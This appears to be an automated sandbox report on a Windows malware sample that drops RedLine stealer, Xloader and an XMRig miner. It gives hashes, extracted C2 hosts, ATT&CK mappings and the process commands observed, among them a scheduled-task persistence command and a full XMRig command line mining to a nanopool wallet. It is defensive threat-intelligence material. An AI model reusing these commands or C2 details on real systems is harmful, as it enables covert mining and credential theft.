redline | 29175495787385b647e6982e1743e0d928e278b44554662100f53a26a4d97907

Analysis

max time kernel
151s
max time network
145s
platform
windows7_x64
resource
win7v20210410
submitted
24-08-2021 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e8d945d2105bad763f3b1dc30f2b6142.exe
Size

395KB
MD5

e8d945d2105bad763f3b1dc30f2b6142
SHA1

4602b1216d9e6961f2398618bc525f54b45fa4c5
SHA256

29175495787385b647e6982e1743e0d928e278b44554662100f53a26a4d97907
SHA512

ae2ab2af1e798b33806e24b614382b4ebd98eb1f19d3731290a4f3463c15abb1847a8f442507d7b55c6cb2fa9e79732fb34dc313f5d9689ac15434d9d5858568

Score

10^/10

redline xloader xmrig 3 ec33 discovery infostealer loader miner persistence rat spyware stealer suricata

Malware Config

Extracted

Family

xloader

Version

2.3

Campaign

ec33

http://www.chaturvedi.fyi/ec33/

Decoy

ride-hard.net

westindiesofficial.com

technewcomer.com

anwen.ink

smarthumanresource.com

aspenhillgetaway.com

westinventures.com

sercomp.pro

fitwoop.com

advertisingviews.site

stinato.com

kidsfundshoes.com

xaufuture.com

emaildesktophelp.com

hey-events.com

v-j9.com

eurekabox.net

export-rice.net

arcadems.com

thejackparker.com

Extracted

Family

redline

Botnet

deyrolorme.xyz:80

xariebelal.xyz:80

anihelardd.xyz:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/872-103-0x00000000006B0000-0x00000000006E2000-memory.dmp	family_redline

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/284-148-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig
behavioral1/memory/284-149-0x00000001402F327C-mapping.dmp	xmrig
behavioral1/memory/284-151-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Xloader Payload 5 IoCs

rat

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\bin.exe	xloader
\Users\Admin\AppData\Local\Temp\bin.exe	xloader
C:\Users\Admin\AppData\Local\Temp\bin.exe	xloader
C:\Users\Admin\AppData\Local\Temp\bin.exe	xloader
behavioral1/memory/1912-120-0x0000000000080000-0x00000000000A8000-memory.dmp	xloader

Executes dropped EXE 9 IoCs

Processes:

JoBrowserSet 2.exeChrome4.exebin.exe3357665.exe5337853.exe7763168.exeWinHoster.exeservices64.exesihost64.exe

pid	process
1988	JoBrowserSet 2.exe
1968	Chrome4.exe
1832	bin.exe
1880	3357665.exe
1944	5337853.exe
872	7763168.exe
1992	WinHoster.exe
524	services64.exe
1708	sihost64.exe

Loads dropped DLL 7 IoCs

Processes:

e8d945d2105bad763f3b1dc30f2b6142.exe5337853.exeChrome4.exeservices64.exe

pid	process
1200	e8d945d2105bad763f3b1dc30f2b6142.exe
1200	e8d945d2105bad763f3b1dc30f2b6142.exe
1200	e8d945d2105bad763f3b1dc30f2b6142.exe
1200	e8d945d2105bad763f3b1dc30f2b6142.exe
1944	5337853.exe
1968	Chrome4.exe
524	services64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5337853.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5337853.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 5 IoCs

Processes:

bin.exesystray.exeservices64.exe

description	pid	process	target process
PID 1832 set thread context of 1256	1832	bin.exe	Explorer.EXE
PID 1832 set thread context of 1256	1832	bin.exe	Explorer.EXE
PID 1912 set thread context of 1256	1912	systray.exe	Explorer.EXE
PID 524 set thread context of 284	524	services64.exe	explorer.exe
PID 1912 set thread context of 284	1912	systray.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1352 1880 WerFault.exe 3357665.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1980 schtasks.exe
1716 schtasks.exe

pid	pid_target	process	target process
1352	1880	WerFault.exe	3357665.exe

pid	process
1980	schtasks.exe
1716	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

JoBrowserSet 2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	JoBrowserSet 2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	JoBrowserSet 2.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

Processes:

bin.exesystray.exe3357665.exeWerFault.exe7763168.exeChrome4.exeservices64.exeexplorer.exe

pid	process
1832	bin.exe
1832	bin.exe
1832	bin.exe
1912	systray.exe
1880	3357665.exe
1912	systray.exe
1352	WerFault.exe
1352	WerFault.exe
1352	WerFault.exe
1352	WerFault.exe
1352	WerFault.exe
1352	WerFault.exe
872	7763168.exe
1912	systray.exe
1912	systray.exe
1968	Chrome4.exe
1912	systray.exe
1912	systray.exe
1912	systray.exe
1912	systray.exe
1912	systray.exe
1912	systray.exe
1912	systray.exe
524	services64.exe
1912	systray.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe
284	explorer.exe
1912	systray.exe
284	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

WerFault.exeExplorer.EXE

pid process

1352 WerFault.exe
1256 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

bin.exesystray.exe

pid process

1832 bin.exe
1832 bin.exe
1832 bin.exe
1832 bin.exe
1912 systray.exe
1912 systray.exe
1912 systray.exe
1912 systray.exe

pid	process
1352	WerFault.exe
1256	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

JoBrowserSet 2.exebin.exe3357665.exe7763168.exesystray.exeWerFault.exeExplorer.EXEChrome4.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1988	JoBrowserSet 2.exe
Token: SeDebugPrivilege	1832	bin.exe
Token: SeDebugPrivilege	1880	3357665.exe
Token: SeDebugPrivilege	872	7763168.exe
Token: SeDebugPrivilege	1912	systray.exe
Token: SeDebugPrivilege	1352	WerFault.exe
Token: SeShutdownPrivilege	1256	Explorer.EXE
Token: SeDebugPrivilege	1968	Chrome4.exe
Token: SeDebugPrivilege	524	services64.exe
Token: SeLockMemoryPrivilege	284	explorer.exe
Token: SeLockMemoryPrivilege	284	explorer.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

Explorer.EXE

pid process

1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE
1256 Explorer.EXE

pid	process
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE

pid	process
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e8d945d2105bad763f3b1dc30f2b6142.exeJoBrowserSet 2.exe5337853.exeExplorer.EXEsystray.exe3357665.exeChrome4.execmd.exeservices64.execmd.exe

description	pid	process	target process
PID 1200 wrote to memory of 1988	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	JoBrowserSet 2.exe
PID 1200 wrote to memory of 1988	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	JoBrowserSet 2.exe
PID 1200 wrote to memory of 1988	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	JoBrowserSet 2.exe
PID 1200 wrote to memory of 1988	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	JoBrowserSet 2.exe
PID 1200 wrote to memory of 1968	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	Chrome4.exe
PID 1200 wrote to memory of 1968	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	Chrome4.exe
PID 1200 wrote to memory of 1968	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	Chrome4.exe
PID 1200 wrote to memory of 1968	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	Chrome4.exe
PID 1200 wrote to memory of 1832	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	bin.exe
PID 1200 wrote to memory of 1832	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	bin.exe
PID 1200 wrote to memory of 1832	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	bin.exe
PID 1200 wrote to memory of 1832	1200	e8d945d2105bad763f3b1dc30f2b6142.exe	bin.exe
PID 1988 wrote to memory of 1880	1988	JoBrowserSet 2.exe	3357665.exe
PID 1988 wrote to memory of 1880	1988	JoBrowserSet 2.exe	3357665.exe
PID 1988 wrote to memory of 1880	1988	JoBrowserSet 2.exe	3357665.exe
PID 1988 wrote to memory of 1944	1988	JoBrowserSet 2.exe	5337853.exe
PID 1988 wrote to memory of 1944	1988	JoBrowserSet 2.exe	5337853.exe
PID 1988 wrote to memory of 1944	1988	JoBrowserSet 2.exe	5337853.exe
PID 1988 wrote to memory of 1944	1988	JoBrowserSet 2.exe	5337853.exe
PID 1988 wrote to memory of 872	1988	JoBrowserSet 2.exe	7763168.exe
PID 1988 wrote to memory of 872	1988	JoBrowserSet 2.exe	7763168.exe
PID 1988 wrote to memory of 872	1988	JoBrowserSet 2.exe	7763168.exe
PID 1988 wrote to memory of 872	1988	JoBrowserSet 2.exe	7763168.exe
PID 1944 wrote to memory of 1992	1944	5337853.exe	WinHoster.exe
PID 1944 wrote to memory of 1992	1944	5337853.exe	WinHoster.exe
PID 1944 wrote to memory of 1992	1944	5337853.exe	WinHoster.exe
PID 1944 wrote to memory of 1992	1944	5337853.exe	WinHoster.exe
PID 1256 wrote to memory of 1912	1256	Explorer.EXE	systray.exe
PID 1256 wrote to memory of 1912	1256	Explorer.EXE	systray.exe
PID 1256 wrote to memory of 1912	1256	Explorer.EXE	systray.exe
PID 1256 wrote to memory of 1912	1256	Explorer.EXE	systray.exe
PID 1912 wrote to memory of 2044	1912	systray.exe	cmd.exe
PID 1912 wrote to memory of 2044	1912	systray.exe	cmd.exe
PID 1912 wrote to memory of 2044	1912	systray.exe	cmd.exe
PID 1912 wrote to memory of 2044	1912	systray.exe	cmd.exe
PID 1880 wrote to memory of 1352	1880	3357665.exe	WerFault.exe
PID 1880 wrote to memory of 1352	1880	3357665.exe	WerFault.exe
PID 1880 wrote to memory of 1352	1880	3357665.exe	WerFault.exe
PID 1968 wrote to memory of 1740	1968	Chrome4.exe	cmd.exe
PID 1968 wrote to memory of 1740	1968	Chrome4.exe	cmd.exe
PID 1968 wrote to memory of 1740	1968	Chrome4.exe	cmd.exe
PID 1740 wrote to memory of 1980	1740	cmd.exe	schtasks.exe
PID 1740 wrote to memory of 1980	1740	cmd.exe	schtasks.exe
PID 1740 wrote to memory of 1980	1740	cmd.exe	schtasks.exe
PID 1968 wrote to memory of 524	1968	Chrome4.exe	services64.exe
PID 1968 wrote to memory of 524	1968	Chrome4.exe	services64.exe
PID 1968 wrote to memory of 524	1968	Chrome4.exe	services64.exe
PID 524 wrote to memory of 1140	524	services64.exe	cmd.exe
PID 524 wrote to memory of 1140	524	services64.exe	cmd.exe
PID 524 wrote to memory of 1140	524	services64.exe	cmd.exe
PID 1140 wrote to memory of 1716	1140	cmd.exe	schtasks.exe
PID 1140 wrote to memory of 1716	1140	cmd.exe	schtasks.exe
PID 1140 wrote to memory of 1716	1140	cmd.exe	schtasks.exe
PID 524 wrote to memory of 1708	524	services64.exe	sihost64.exe
PID 524 wrote to memory of 1708	524	services64.exe	sihost64.exe
PID 524 wrote to memory of 1708	524	services64.exe	sihost64.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe
PID 524 wrote to memory of 284	524	services64.exe	explorer.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1256

C:\Users\Admin\AppData\Local\Temp\e8d945d2105bad763f3b1dc30f2b6142.exe
"C:\Users\Admin\AppData\Local\Temp\e8d945d2105bad763f3b1dc30f2b6142.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1200

C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
"C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988

C:\Users\Admin\AppData\Roaming\3357665.exe
"C:\Users\Admin\AppData\Roaming\3357665.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1880

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1880 -s 1940
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Users\Admin\AppData\Roaming\5337853.exe
"C:\Users\Admin\AppData\Roaming\5337853.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1944

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
5⤵
- Executes dropped EXE
PID:1992

C:\Users\Admin\AppData\Roaming\7763168.exe
"C:\Users\Admin\AppData\Roaming\7763168.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:1980

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1140

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
6⤵
- Creates scheduled task(s)
PID:1716

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
- Executes dropped EXE
PID:1708

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:284

C:\Users\Admin\AppData\Local\Temp\bin.exe
"C:\Users\Admin\AppData\Local\Temp\bin.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"
3⤵
PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
MD5
6d997a345651126bf81cfa573268ef6b

SHA1
04813a5732d71d719430e43c34eb5c6ad10695ab

SHA256
55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

SHA512
988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
MD5
6d997a345651126bf81cfa573268ef6b

SHA1
04813a5732d71d719430e43c34eb5c6ad10695ab

SHA256
55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

SHA512
988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

Download Submit
C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
MD5
61fd8e96260e4fffb555d16085c818a8

SHA1
2f7a6a9d4d2f0c1e347222ca7e0d863d88104e5b

SHA256
8e2098f566177904903e9b219a595af6cd948b7d00fe12aed8545ea1cc4ebd59

SHA512
9d0772ad0494e3fa451bba3e20e72bff292271c4ad3a06c4bfac38c692421f5d43d5468d251d796f92bfb60eff4c70700c82374d11b7a3cbf199fc14843e7ee4

Download Submit
C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
MD5
61fd8e96260e4fffb555d16085c818a8

SHA1
2f7a6a9d4d2f0c1e347222ca7e0d863d88104e5b

SHA256
8e2098f566177904903e9b219a595af6cd948b7d00fe12aed8545ea1cc4ebd59

SHA512
9d0772ad0494e3fa451bba3e20e72bff292271c4ad3a06c4bfac38c692421f5d43d5468d251d796f92bfb60eff4c70700c82374d11b7a3cbf199fc14843e7ee4

Download Submit
C:\Users\Admin\AppData\Local\Temp\bin.exe
MD5
9efb46ac666bf0cd1b417f69e58151d5

SHA1
79cf36a9cc63bded573593a0aa93bad550d10e30

SHA256
fe1f35c815222d77527faddd4b99c9a697b2fb8fe27cd45c50b5f6ca499cce63

SHA512
33188085909fea6fc6f646a5e8cd217abbe07cdf1ddbf48d7099b8992a6ef8cab8536606d4f6eb77bb18ad0e71d9c1287ce5855c6f436a1eb13ed6639c2e959a

Download Submit
C:\Users\Admin\AppData\Local\Temp\bin.exe
MD5
9efb46ac666bf0cd1b417f69e58151d5

SHA1
79cf36a9cc63bded573593a0aa93bad550d10e30

SHA256
fe1f35c815222d77527faddd4b99c9a697b2fb8fe27cd45c50b5f6ca499cce63

SHA512
33188085909fea6fc6f646a5e8cd217abbe07cdf1ddbf48d7099b8992a6ef8cab8536606d4f6eb77bb18ad0e71d9c1287ce5855c6f436a1eb13ed6639c2e959a

Download Submit
C:\Users\Admin\AppData\Roaming\3357665.exe
MD5
463bac4a842400e537500a5a20fbe6a8

SHA1
7ea66b11085e4b3626223e5573cae4c6ca421c89

SHA256
d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

SHA512
0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

Download Submit
C:\Users\Admin\AppData\Roaming\3357665.exe
MD5
463bac4a842400e537500a5a20fbe6a8

SHA1
7ea66b11085e4b3626223e5573cae4c6ca421c89

SHA256
d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

SHA512
0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

Download Submit
C:\Users\Admin\AppData\Roaming\5337853.exe
MD5
3598180fddc06dbd304b76627143b01d

SHA1
1d39b0dd8425359ed94e606cb04f9c5e49ed1899

SHA256
44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

SHA512
8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

Download Submit
C:\Users\Admin\AppData\Roaming\5337853.exe
MD5
3598180fddc06dbd304b76627143b01d

SHA1
1d39b0dd8425359ed94e606cb04f9c5e49ed1899

SHA256
44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

SHA512
8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

Download Submit
C:\Users\Admin\AppData\Roaming\7763168.exe
MD5
883fe31989c8dfc8f2e22a94ae2d369a

SHA1
2933d6fafbebe84c12c0e226bf182e708d3bd32e

SHA256
7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

SHA512
c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

Download Submit
C:\Users\Admin\AppData\Roaming\7763168.exe
MD5
883fe31989c8dfc8f2e22a94ae2d369a

SHA1
2933d6fafbebe84c12c0e226bf182e708d3bd32e

SHA256
7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

SHA512
c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
7f7246cca411275a62d7fdee50877859

SHA1
7e3a4e01f44ce712426a04fc2719ea7460304788

SHA256
989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

SHA512
f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
7f7246cca411275a62d7fdee50877859

SHA1
7e3a4e01f44ce712426a04fc2719ea7460304788

SHA256
989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

SHA512
f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

Download Submit
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
MD5
3598180fddc06dbd304b76627143b01d

SHA1
1d39b0dd8425359ed94e606cb04f9c5e49ed1899

SHA256
44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

SHA512
8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

Download Submit
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
MD5
3598180fddc06dbd304b76627143b01d

SHA1
1d39b0dd8425359ed94e606cb04f9c5e49ed1899

SHA256
44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

SHA512
8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

Download Submit
